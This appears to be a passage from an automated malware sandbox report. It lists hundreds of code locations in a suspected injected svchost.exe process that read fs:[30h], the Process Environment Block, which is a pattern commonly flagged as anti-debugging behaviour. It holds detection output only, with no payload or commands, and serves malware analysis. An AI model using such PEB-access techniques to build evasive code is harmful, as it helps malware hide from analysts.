                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B8243 mov eax, dword ptr fs:[00000030h]2_2_036B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B8243 mov ecx, dword ptr fs:[00000030h]2_2_036B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0370625D mov eax, dword ptr fs:[00000030h]2_2_0370625D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A250 mov eax, dword ptr fs:[00000030h]2_2_0362A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636259 mov eax, dword ptr fs:[00000030h]2_2_03636259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EA250 mov eax, dword ptr fs:[00000030h]2_2_036EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EA250 mov eax, dword ptr fs:[00000030h]2_2_036EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362823B mov eax, dword ptr fs:[00000030h]2_2_0362823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036402E1 mov eax, dword ptr fs:[00000030h]2_2_036402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036402E1 mov eax, dword ptr fs:[00000030h]2_2_036402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036402E1 mov eax, dword ptr fs:[00000030h]2_2_036402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h]2_2_0363A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h]2_2_0363A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h]2_2_0363A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h]2_2_0363A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h]2_2_0363A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037062D6 mov eax, dword ptr fs:[00000030h]2_2_037062D6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h]2_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C62A0 mov ecx, dword ptr fs:[00000030h]2_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h]2_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h]2_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h]2_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h]2_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E284 mov eax, dword ptr fs:[00000030h]2_2_0366E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E284 mov eax, dword ptr fs:[00000030h]2_2_0366E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B0283 mov eax, dword ptr fs:[00000030h]2_2_036B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B0283 mov eax, dword ptr fs:[00000030h]2_2_036B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B0283 mov eax, dword ptr fs:[00000030h]2_2_036B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704164 mov eax, dword ptr fs:[00000030h]2_2_03704164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704164 mov eax, dword ptr fs:[00000030h]2_2_03704164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C4144 mov eax, dword ptr fs:[00000030h]2_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C4144 mov eax, dword ptr fs:[00000030h]2_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C4144 mov ecx, dword ptr fs:[00000030h]2_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C4144 mov eax, dword ptr fs:[00000030h]2_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C4144 mov eax, dword ptr fs:[00000030h]2_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362C156 mov eax, dword ptr fs:[00000030h]2_2_0362C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C8158 mov eax, dword ptr fs:[00000030h]2_2_036C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636154 mov eax, dword ptr fs:[00000030h]2_2_03636154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636154 mov eax, dword ptr fs:[00000030h]2_2_03636154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03660124 mov eax, dword ptr fs:[00000030h]2_2_03660124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]2_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov ecx, dword ptr fs:[00000030h]2_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]2_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]2_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov ecx, dword ptr fs:[00000030h]2_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]2_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]2_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov ecx, dword ptr fs:[00000030h]2_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]2_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov ecx, dword ptr fs:[00000030h]2_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DA118 mov ecx, dword ptr fs:[00000030h]2_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DA118 mov eax, dword ptr fs:[00000030h]2_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DA118 mov eax, dword ptr fs:[00000030h]2_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DA118 mov eax, dword ptr fs:[00000030h]2_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F0115 mov eax, dword ptr fs:[00000030h]2_2_036F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037061E5 mov eax, dword ptr fs:[00000030h]2_2_037061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036601F8 mov eax, dword ptr fs:[00000030h]2_2_036601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F61C3 mov eax, dword ptr fs:[00000030h]2_2_036F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F61C3 mov eax, dword ptr fs:[00000030h]2_2_036F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE1D0 mov eax, dword ptr fs:[00000030h]2_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE1D0 mov eax, dword ptr fs:[00000030h]2_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE1D0 mov eax, dword ptr fs:[00000030h]2_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE1D0 mov eax, dword ptr fs:[00000030h]2_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03670185 mov eax, dword ptr fs:[00000030h]2_2_03670185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EC188 mov eax, dword ptr fs:[00000030h]2_2_036EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EC188 mov eax, dword ptr fs:[00000030h]2_2_036EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D4180 mov eax, dword ptr fs:[00000030h]2_2_036D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D4180 mov eax, dword ptr fs:[00000030h]2_2_036D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B019F mov eax, dword ptr fs:[00000030h]2_2_036B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B019F mov eax, dword ptr fs:[00000030h]2_2_036B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B019F mov eax, dword ptr fs:[00000030h]2_2_036B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B019F mov eax, dword ptr fs:[00000030h]2_2_036B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A197 mov eax, dword ptr fs:[00000030h]2_2_0362A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A197 mov eax, dword ptr fs:[00000030h]2_2_0362A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A197 mov eax, dword ptr fs:[00000030h]2_2_0362A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365C073 mov eax, dword ptr fs:[00000030h]2_2_0365C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03632050 mov eax, dword ptr fs:[00000030h]2_2_03632050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6050 mov eax, dword ptr fs:[00000030h]2_2_036B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A020 mov eax, dword ptr fs:[00000030h]2_2_0362A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362C020 mov eax, dword ptr fs:[00000030h]2_2_0362C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C6030 mov eax, dword ptr fs:[00000030h]2_2_036C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B4000 mov ecx, dword ptr fs:[00000030h]2_2_036B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E016 mov eax, dword ptr fs:[00000030h]2_2_0364E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E016 mov eax, dword ptr fs:[00000030h]2_2_0364E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E016 mov eax, dword ptr fs:[00000030h]2_2_0364E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E016 mov eax, dword ptr fs:[00000030h]2_2_0364E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0362A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036380E9 mov eax, dword ptr fs:[00000030h]2_2_036380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B60E0 mov eax, dword ptr fs:[00000030h]2_2_036B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362C0F0 mov eax, dword ptr fs:[00000030h]2_2_0362C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036720F0 mov ecx, dword ptr fs:[00000030h]2_2_036720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B20DE mov eax, dword ptr fs:[00000030h]2_2_036B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036280A0 mov eax, dword ptr fs:[00000030h]2_2_036280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C80A8 mov eax, dword ptr fs:[00000030h]2_2_036C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F60B8 mov eax, dword ptr fs:[00000030h]2_2_036F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F60B8 mov ecx, dword ptr fs:[00000030h]2_2_036F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363208A mov eax, dword ptr fs:[00000030h]2_2_0363208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638770 mov eax, dword ptr fs:[00000030h]2_2_03638770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366674D mov esi, dword ptr fs:[00000030h]2_2_0366674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366674D mov eax, dword ptr fs:[00000030h]2_2_0366674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366674D mov eax, dword ptr fs:[00000030h]2_2_0366674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630750 mov eax, dword ptr fs:[00000030h]2_2_03630750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BE75D mov eax, dword ptr fs:[00000030h]2_2_036BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672750 mov eax, dword ptr fs:[00000030h]2_2_03672750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672750 mov eax, dword ptr fs:[00000030h]2_2_03672750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B4755 mov eax, dword ptr fs:[00000030h]2_2_036B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C720 mov eax, dword ptr fs:[00000030h]2_2_0366C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C720 mov eax, dword ptr fs:[00000030h]2_2_0366C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366273C mov eax, dword ptr fs:[00000030h]2_2_0366273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366273C mov ecx, dword ptr fs:[00000030h]2_2_0366273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366273C mov eax, dword ptr fs:[00000030h]2_2_0366273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AC730 mov eax, dword ptr fs:[00000030h]2_2_036AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C700 mov eax, dword ptr fs:[00000030h]2_2_0366C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630710 mov eax, dword ptr fs:[00000030h]2_2_03630710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03660710 mov eax, dword ptr fs:[00000030h]2_2_03660710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036527ED mov eax, dword ptr fs:[00000030h]2_2_036527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036527ED mov eax, dword ptr fs:[00000030h]2_2_036527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036527ED mov eax, dword ptr fs:[00000030h]2_2_036527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BE7E1 mov eax, dword ptr fs:[00000030h]2_2_036BE7E1
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036347FB mov eax, dword ptr fs:[00000030h] (listed 2 times)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0363C7C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B07C3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036307AF mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036E47A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036D678E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036F866E mov eax, dword ptr fs:[00000030h] (listed 2 times)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0366A660 mov eax, dword ptr fs:[00000030h] (listed 2 times)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03662674 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0364C640 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0364E627 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03666620 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03668620 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0363262C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036AE609 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0364260B mov eax, dword ptr fs:[00000030h] (listed 7 times)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672619 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036AE6F2 mov eax, dword ptr fs:[00000030h] (listed 4 times)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B06F1 mov eax, dword ptr fs:[00000030h] (listed 2 times)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0366A6C7 mov ebx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0366A6C7 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0366C6A6 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036666B0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03634690 mov eax, dword ptr fs:[00000030h] (listed 2 times)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0366656A mov eax, dword ptr fs:[00000030h] (listed 3 times)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03638550 mov eax, dword ptr fs:[00000030h] (listed 2 times)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03640535 mov eax, dword ptr fs:[00000030h] (listed 6 times)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h] (listed 5 times)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036C6500 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03704500 mov eax, dword ptr fs:[00000030h] (listed 7 times)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h] (listed 8 times)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036325E0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0366C5ED mov eax, dword ptr fs:[00000030h] (listed 2 times)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0366E5CF mov eax, dword ptr fs:[00000030h] (listed 2 times)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036365D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0366A5D0 mov eax, dword ptr fs:[00000030h] (listed 2 times)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B05A7 mov eax, dword ptr fs:[00000030h] (listed 3 times)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036545B1 mov eax, dword ptr fs:[00000030h] (listed 2 times)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03632582 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03632582 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03664588 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0366E59C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036BC460 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0365A470 mov eax, dword ptr fs:[00000030h] (listed 3 times)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h] (listed 8 times)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036EA456 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0362645D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0365245A mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0362E420 mov eax, dword ptr fs:[00000030h] (listed 3 times)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0362C427 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h] (listed 7 times)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0366A430 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03668402 mov eax, dword ptr fs:[00000030h] (listed 3 times)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036304E5 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036364AB mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036644B0 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036BA4B0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036EA49A mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0362CB7E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036E4B4B mov eax, dword ptr fs:[00000030h] (listed 2 times)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03702B57 mov eax, dword ptr fs:[00000030h] (listed 4 times)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036C6B40 mov eax, dword ptr fs:[00000030h] (listed 2 times)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036FAB40 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036D8B42 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03628B50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036DEB50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0365EB20 mov eax, dword ptr fs:[00000030h] (listed 2 times)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036F8B28 mov eax, dword ptr fs:[00000030h] (listed 2 times)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03704B00 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h] (listed 9 times)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03638BF0 mov eax, dword ptr fs:[00000030h] (listed 3 times)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0365EBFC mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036BCBF0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03650BCB mov eax, dword ptr fs:[00000030h] (listed 3 times)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03630BCD mov eax, dword ptr fs:[00000030h] (listed 3 times)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036DEBD0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03640BBE mov eax, dword ptr fs:[00000030h] (listed 2 times)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036E4BB0 mov eax, dword ptr fs:[00000030h] (listed 2 times)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0366CA6F mov eax, dword ptr fs:[00000030h] (listed 3 times)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036DEA60 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036ACA72 mov eax, dword ptr fs:[00000030h] (listed 2 times)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h] (listed 7 times)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03640A5B mov eax, dword ptr fs:[00000030h] (listed 2 times)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0366CA24 mov eax, dword ptr fs:[00000030h]
